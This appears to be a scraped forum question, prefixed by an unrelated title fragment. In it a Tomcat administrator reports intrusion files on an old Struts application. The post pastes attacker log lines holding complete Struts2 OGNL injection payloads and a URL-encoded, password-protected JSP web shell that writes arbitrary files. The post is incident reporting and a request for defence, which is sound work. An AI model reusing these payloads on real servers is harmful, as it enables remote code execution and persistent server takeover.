java1%3c%3c30是什么意思,Java/Tomcat hacked [closed]

I have had a few files show up on my tomcat server lately that are obviously hacker attempts. I support an older application that uses struts and ibatis along with various other frameworks. Three files were created, a system1.jsp under the actual webapp directory, so like tomcat/webapps/ROOT/system1.jsp, and then two other files that were created under tomcat/webapps/system2.jsp and tomcat/webapps/system3.jsp.

The content of these files strange, it looks like its trying to create a user account, which would seem like a long shot. The way struts was set up there is no way they would actually reach those jsp files anyways, what makes me worry is the fact that they were able to create these files at all. How can I prevent this from happening?

Here is the apache log from the hack, as well as the rest of the code,

198.211.11.202 - - [28/Apr/2013:02:05:34 -0500] "GET request!start.do?

('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)

(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i12)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i13)(('\\43xman.getWriter().println(\\43req.getServletContext().getRealPath(%22\\u005c%22))')(d))&(i2)(('\\43fos\\75new\\40java.io.FileOutputStream(new\\40java.lang.StringBuilder(\\43req.getRealPath(%22\\u005c%22)).append(@java.io.File@separator).append(%22system1.jsp%22).toString())')(d))&(i3)(('\\43fos.write(\\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\\43fos.close()')(d))&t=%3C%25%40page+contentType%3D%22text%2Fhtml%3B+charset%3DGBK%22+import%3D%22java.io.*%3B%22%25%3E%0A%3C%25%21private+String+password%3D%22hehe%22%3B%2F%2F%E6%B7%87%EE%86%BD%E6%95%BC%E7%80%B5%E5%97%99%E7%88%9C%25%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3Ehahahaha%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+bgcolor%3D%22%23ffffff%22%3E%0A%3C%25%0AString+act%3D%22%22%3B%0AString+path%3Drequest.getParameter%28%22path%22%29%3B%0AString+content%3Drequest.getParameter%28%22content%22%29%3B%0AString+url%3Drequest.getRequestURI%28%29%3B%0AString+url2%3Drequest.getRealPath%28request.getServletPath%28%29%29%3B%0Atry%0A%7Bact%3Drequest.getParameter%28%22act%22%29.toString%28%29%3B%7D%0Acatch%28Exception+e%29%7B%7D%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29%21%3Dnull%29%0A%7B%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29.toString%28%29.equals%28%22hehe%22%29%29%0A%7B%0Aif+%28path%21%3Dnull+%26%26+%21path.equals%28%22%22%29+%26%26+content%21%3Dnull+%26%26+%21content.equals%28%22%22%29%29%0A%7B%0A+++try%7B%0A+++++File+newfile%3Dnew+File%28path%29%3B%0A+++++PrintWriter+writer%3Dnew+PrintWriter%28newfile%29%3B%0A+++++writer.println%28content%29%3B%0A+++++writer.close%28%29%3B%0A+++++if+%28newfile.exists%28%29+%26%26+newfile.length%28%29%3E0%29%0A+++++%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+ok%21%3C%2Ffont%3E%22%29%3B%0A+++++%7Delse%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+erry%21%3C%2Ffont%3E%22%29%3B%0A+++++%7D%0A+++%7Dcatch%28Exception+e%29%0A+++%7B%0A+++++e.printStackTrace%28%29%3B%0A+++%7D%0A%7D%0Aout.println%28%22%3Cform+action%3D%22%2Burl%2B%22+method%3Dpost%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3%3E%3Cbr%3E%3C%2Ffont%3E%3Cinput+type%3Dtext+size%3D54+name%3D%27path%27%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3+color%3Dred%3E%22%2Burl2%2B%22%3C%2Ffont%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Ctextarea+name%3D%27content%27+rows%3D15+cols%3D50%3E%3C%2Ftextarea%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+value%3D%27save%21%27%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%22%29%3B%0A%7D%0A%7Delse%7B%0Aout.println%28%22%3Cdiv+align%3D%27center%27%3E%3Cform+action%3D%27%3Fact%3Dlogin%27+method%3D%27post%27%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27password%27+name%3D%27pass%27%2F%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+name%3D%27update%27+class%3D%27unnamed1%27+value%3D%27Login%27+%2F%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%3C%2Fdiv%3E%22%29%3B%0A%7Dif%28act.equals%28%22login%22%29%29%0A%7B%0A++++String+pass%3Drequest.getParameter%28%22pass%22%29%3B%0A++++if%28pass.equals%28password%29%29%0A++++%7B%0A+++++session.setAttribute%28%22hehe%22%2C%22hehe%22%29%3B%0A+++++String+uri%3Drequest.getRequestURI%28%29%3B+++%0A+++++uri%3Duri.substring%28uri.lastIndexOf%28%22%2F%22%29%2B1%29%3B+%0A++++response.sendRedirect%28uri%29%3B%0A++++%7Delse%0A++++%7B%0Aout.println%28%22Error%22%29%3B%0Aout.println%28%22%3Ca+href%3D%27javascript%3Ahistory.go%28-1%29%27%3E%3Cfont+color%3D%27red%27%3Ego+back%3C%2Ffont%3E%3C%2Fa%3E%3C%2Fdiv%3E%3Cbr%3E%22%29%3B%0A++++%7D%0A++++%7D%0A%25%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E HTTP/1.1" 200 12387

198.211.11.202 - - [28/Apr/2013:02:05:35 -0500] "GET /request!start.do?('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43req.getRealPath(%22\\u005c%22))')(d))&(i99)(('\\43xman.getWriter().close()')(d)) HTTP/1.1" 200 29

198.211.11.202 - - [28/Apr/2013:02:05:35 -0500] "GET /request!start.do?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(i2)(('\\43fos\\75new\\40java.io.FileOutputStream(\\43req.getParameter(%22path%22))')(d))&(i3)(('\\43fos.write(\\43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('\\43fos.close()')(d))&t=%3C%25%40page+contentType%3D%22text%2Fhtml%3B+charset%3DGBK%22+import%3D%22java.io.*%3B%22%25%3E%0A%3C%25%21private+String+password%3D%22hehe%22%3B%2F%2F%E6%B7%87%EE%86%BD%E6%95%BC%E7%80%B5%E5%97%99%E7%88%9C%25%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3Ehahahaha%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+bgcolor%3D%22%23ffffff%22%3E%0A%3C%25%0AString+act%3D%22%22%3B%0AString+path%3Drequest.getParameter%28%22path%22%29%3B%0AString+content%3Drequest.getParameter%28%22content%22%29%3B%0AString+url%3Drequest.getRequestURI%28%29%3B%0AString+url2%3Drequest.getRealPath%28request.getServletPath%28%29%29%3B%0Atry%0A%7Bact%3Drequest.getParameter%28%22act%22%29.toString%28%29%3B%7D%0Acatch%28Exception+e%29%7B%7D%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29%21%3Dnull%29%0A%7B%0Aif%28request.getSession%28%29.getAttribute%28%22hehe%22%29.toString%28%29.equals%28%22hehe%22%29%29%0A%7B%0Aif+%28path%21%3Dnull+%26%26+%21path.equals%28%22%22%29+%26%26+content%21%3Dnull+%26%26+%21content.equals%28%22%22%29%29%0A%7B%0A+++try%7B%0A+++++File+newfile%3Dnew+File%28path%29%3B%0A+++++PrintWriter+writer%3Dnew+PrintWriter%28newfile%29%3B%0A+++++writer.println%28content%29%3B%0A+++++writer.close%28%29%3B%0A+++++if+%28newfile.exists%28%29+%26%26+newfile.length%28%29%3E0%29%0A+++++%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+ok%21%3C%2Ffont%3E%22%29%3B%0A+++++%7Delse%7B%0A+++++++out.println%28%22%3Cfont+size%3D3+color%3Dred%3Esave+erry%21%3C%2Ffont%3E%22%29%3B%0A+++++%7D%0A+++%7Dcatch%28Exception+e%29%0A+++%7B%0A+++++e.printStackTrace%28%29%3B%0A+++%7D%0A%7D%0Aout.println%28%22%3Cform+action%3D%22%2Burl%2B%22+method%3Dpost%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3%3E%3Cbr%3E%3C%2Ffont%3E%3Cinput+type%3Dtext+size%3D54+name%3D%27path%27%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cfont+size%3D3+color%3Dred%3E%22%2Burl2%2B%22%3C%2Ffont%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Ctextarea+name%3D%27content%27+rows%3D15+cols%3D50%3E%3C%2Ftextarea%3E%3Cbr%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+value%3D%27save%21%27%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%22%29%3B%0A%7D%0A%7Delse%7B%0Aout.println%28%22%3Cdiv+align%3D%27center%27%3E%3Cform+action%3D%27%3Fact%3Dlogin%27+method%3D%27post%27%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27password%27+name%3D%27pass%27%2F%3E%22%29%3B%0Aout.println%28%22%3Cinput+type%3D%27submit%27+name%3D%27update%27+class%3D%27unnamed1%27+value%3D%27Login%27+%2F%3E%22%29%3B%0Aout.println%28%22%3C%2Fform%3E%3C%2Fdiv%3E%22%29%3B%0A%7Dif%28act.equals%28%22login%22%29%29%0A%7B%0A++++String+pass%3Drequest.getParameter%28%22pass%22%29%3B%0A++++if%28pass.equals%28password%29%29%0A++++%7B%0A+++++session.setAttribute%28%22hehe%22%2C%22hehe%22%29%3B%0A+++++String+uri%3Drequest.getRequestURI%28%29%3B+++%0A+++++uri%3Duri.substring%28uri.lastIndexOf%28%22%2F%22%29%2B1%29%3B+%0A++++response.sendRedirect%28uri%29%3B%0A++++%7Delse%0A++++%7B%0Aout.println%28%22Error%22%29%3B%0Aout.println%28%22%3Ca+href%3D%27javascript%3Ahistory.go%28-1%29%27%3E%3Cfont+color%3D%27red%27%3Ego+back%3C%2Ffont%3E%3C%2Fa%3E%3C%2Fdiv%3E%3Cbr%3E%22%29%3B%0A++++%7D%0A++++%7D%0A%25%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E&path=/opt/tomcat/webapp/ROOT/system2.jsp HTTP/1.1" 200 12387